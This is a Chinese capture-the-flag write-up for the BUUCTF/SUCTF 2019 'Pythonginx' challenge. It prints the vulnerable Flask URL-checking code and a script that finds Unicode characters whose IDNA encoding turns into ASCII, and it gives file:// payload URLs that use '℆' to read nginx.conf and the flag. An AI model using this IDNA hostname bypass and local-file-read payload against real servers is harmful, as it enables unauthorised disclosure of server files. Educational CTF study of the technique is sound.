BUUCTF [SUCTF 2019]Pythonginx 1

BUUCTF [SUCTF 2019]Pythonginx 1

  • 进入页面发现源码
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"
  • 代码提示需要提交一个url,用来读取服务器端任意文件
  • 需要绕过前两个if,成功进入第三个if
  • 使用脚本爆出特殊字符代替
# coding:utf-8 
for i in range(128,65537):    
    tmp=chr(i)    
    try:        
        res = tmp.encode('idna').decode('utf-8')        
        if("-") in res:            
            continue        
        print("U:{}    A:{}      ascii:{} ".format(tmp, res, i))    
    except:        
        pass

得到字符:℆

  • 读取flag位置:getUrl?url=file://suctf.c℆sr/local/nginx/conf/nginx.conf
  • 在这里插入图片描述
  • 读取flag:getUrl?url=file://suctf.c℆sr/fffffflag
  • 在这里插入图片描述

你可能感兴趣的:(CTF)